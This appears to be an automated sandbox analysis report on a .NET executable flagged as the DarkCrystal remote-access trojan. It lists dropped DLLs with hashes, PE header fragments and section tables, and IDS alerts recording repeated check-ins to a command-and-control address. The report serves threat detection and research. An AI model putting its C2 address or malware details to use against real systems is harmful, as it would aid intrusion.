                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):36352
                                                  Entropy (8bit):5.668291349855899
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):69632
                                                  Entropy (8bit):5.932541123129161
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):33792
                                                  Entropy (8bit):5.541771649974822
                                                  Encrypted:false
                                                  Malicious:true
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
                                                  Encrypted:false
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):64000
                                                  Entropy (8bit):5.857602289000348
                                                  Encrypted:false
                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):342528
                                                  Entropy (8bit):6.170134230759619
                                                  Encrypted:false
                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (901), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):901
                                                  Entropy (8bit):5.909741998396687
                                                  Encrypted:false
                                                  SSDEEP:12:NmMcjlyBfLYrNlc13nP1EG1mc/gnFtR272rC4Q09pAT9LpfmrQNCYpytTVomMoOt:G5yBf1XPzMnFteon96T9LOmCDVoa/R4
                                                  MD5:083433C8E375F9075CC1912A2E43DE62
                                                  SHA1:6508FBD9569AAC112E8277585376FF818BE619E9
                                                  SHA-256:33FB51A3057CDD92C42784FFD5B78A33A10074E7B0A1F2D8893A968BD46CEE5B
                                                  SHA-512:4B423BA31A035FB9098C99360040FB1709BF65EEB2B77A5FA1D5DF9B722112DD644FC55FB09A7D5C93DD40888500642F414BB71D098C6FDE4F576CC9CD5202ED
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (722), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):722
                                                  Entropy (8bit):5.884509235280514
                                                  Encrypted:false
                                                  SSDEEP:12:mNCiVlR0u/wyV7gDXCbtLY1j2mn8km1hOND9W2Eo5866buzNCsd5NraVHgeoZtfj:mQsldwyxgDXCb5Y1j2a8xnONT66EuzNl
                                                  MD5:A0539983DC393D8C75D6585BD4E91106
                                                  SHA1:752A18DAE8FD6A461372D9730545AC3B488101A7
                                                  SHA-256:A50AD5F8E6CF165549F3DA4D3F36D7F7CC3A506CEB3FEE3470EAB528111BED17
                                                  SHA-512:E3866AEE432F211B38D9D199DA387FFB34C22A90536CD38F00549DCF644BA4FCCE50039F00197214725625264A107DD161FBC6568AA18A988AC9DEC2FCDC449E
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Windows\System32\PING.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):502
                                                  Entropy (8bit):4.6103462178019665
                                                  Encrypted:false
                                                  SSDEEP:12:PR45pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:JKdUOAokItULVDv
                                                  MD5:7F48CA448373AA5F29388ECD8774273A
                                                  SHA1:752382BEB77E9571198056440BC31E38794E742B
                                                  SHA-256:45C2AAF408A9D5F26552732E3B911AB00D2D579736FA6F18E6B3DA7563F722A7
                                                  SHA-512:4A18F00254BA4958EC3D4ED81B4E8CA87DE73F84FAF70EBFA639D051AD79C7C48AD4A12C702A18047D3DC2D9105BAAC562E5B9857CA5CFED32E335CF061533A7
                                                  Malicious:false
                                                  Preview:..Pinging 878411 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.745071784980981
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:KPFv8ATDx0.exe
                                                  File size:2'882'048 bytes
                                                  MD5:3ff58b353cd7e1b70eb300561e146e6c
                                                  SHA1:d9059f5389fad25f1bf44b7332c018f806159df9
                                                  SHA256:15892ecb245a5c3aa1ab94d60ed1d034540b14623bdc6f27acfa1f0a5791ed33
                                                  SHA512:7f2e55642cb0229c5f0bba1a6c7930855258b3fbee3ab033d1802c157c4afec02750b1b7339afeb7e0bc265fe452d94d7d9826bcf28dc657496df0be43e6e935
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  TLSH:D1D5D08696628F32C2B57F3A84DB502D52E0C776B622FF1F391F1095A9163349B062F7
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x6c10ae
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2c1060 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c2000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2bf0b4 | 0x2bf200 | 7eafd7587854d996188a540cead5750e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x2c2000 | 0x370 | 0x400 | 8be70b6e7482777556a4e41300d7a70b | False | 0.3759765625 | data | 2.86187496601071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x2c4000 | 0xc | 0x200 | 867bbcbcdacc7ed8cf18a6937b39ac73 | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "," | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x2c2058 | 0x318 | data |  |  | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T18:52:22.583859+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49742 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:35.443182+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49822 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:46.099413+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49882 | 38.180.228.120 | 80 | TCP
2024-11-19T18:52:59.865009+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49962 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:10.833745+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49975 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:23.318092+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49976 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:33.489962+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49977 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:46.146219+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49978 | 38.180.228.120 | 80 | TCP
2024-11-19T18:53:59.315380+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49979 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:09.443063+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49980 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:20.864944+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49981 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:30.271239+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49982 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:41.865014+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49983 | 38.180.228.120 | 80 | TCP
2024-11-19T18:54:51.099420+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49984 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:02.443241+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49985 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:14.615047+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49986 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:24.693634+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49987 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:35.287033+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49988 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:46.880784+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49989 | 38.180.228.120 | 80 | TCP
2024-11-19T18:55:58.455712+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49990 | 38.180.228.120 | 80 | TCP
2024-11-19T18:56:08.708973+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.7 | 49991 | 38.180.228.120 | 80 | TCP
